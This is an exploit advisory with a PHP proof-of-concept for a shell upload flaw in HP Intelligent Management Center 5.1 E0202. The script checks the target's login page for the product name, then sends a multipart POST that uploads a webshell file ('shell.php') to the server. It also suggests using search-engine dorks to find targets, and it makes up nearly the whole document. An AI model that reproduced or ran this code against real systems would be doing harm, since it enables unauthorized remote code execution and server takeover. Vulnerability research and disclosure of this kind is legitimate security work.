HP Intelligent Management Center 5.1 E0202 Shell Upload

=============================================================================================================================================
| # Title : HP Intelligent =============================================================================================================================================
| # Title : HP Intelligent Management Center 5.1 E0202 Shell Upload Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) |
| # Vendor : https://support.hpe.com/hpesc/public/docDisplay?docId=c03177356 |
=============================================================================================================================================

POC :

[+] Dorking ?n Google Or Other Search Enggine.

[+] Code Description: Upload a malicious PHP file (such as a Webshell) to the server.

[+] save code as poc.php.

[+] Set Target : line 54

[+] USage : php poc.php

[+] PayLoad :

<?php

function is_imc($target) {
$url = "$target/login.jsf";
$response = @file_get_contents($url);

if ($response !== false && strpos($response, "HP Intelligent Management Center") !== false) {
return true;
}
return false;
}

function upload_file($ip, $port, $target_uri, $upload_path, $local_file) {
if (!is_imc("http://$ip:$port$target_uri")) {
echo "$ip:$port - This isn't an HP Intelligent Management Center\n";
return;
}

$file_content = file_get_contents($local_file);
if ($file_content === false) {
echo "Failed to read local file: $local_file\n";
return;
}

$boundary = "----WebKitFormBoundary" . md5(time());
$eol = "\r\n";

$data = "--$boundary$eol";
$data .= "Content-Disposition: form-data; name=\"file\"; filename=\"" . basename($local_file) . "\"$eol";
$data .= "Content-Type: application/octet-stream$eol$eol";
$data .= $file_content . "$eol";
$data .= "--$boundary--$eol";

$opts = [
"http" => [
"method" => "POST",
"header" => "Content-Type: multipart/form-data; boundary=$boundary\r\n",
"content" => $data
]
];

$url = "http://$ip:$port$target_uri/$upload_path";
echo "$ip:$port - Uploading file...\n";
$response = @file_get_contents($url, false, stream_context_create($opts));

if ($response !== false) {
echo "$ip:$port - File uploaded successfully to $url\n";
} else {
echo "$ip:$port - File upload failed\n";
}
}

// Example usage
$ip = "192.168.1.1";
$port = 8080;
$target_uri = "/imc";
$upload_path = "uploads/shell.php"; // Adjust this path as needed
$local_file = "shell.php"; // Your payload file

upload_file($ip, $port, $target_uri, $upload_path, $local_file);

?>

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================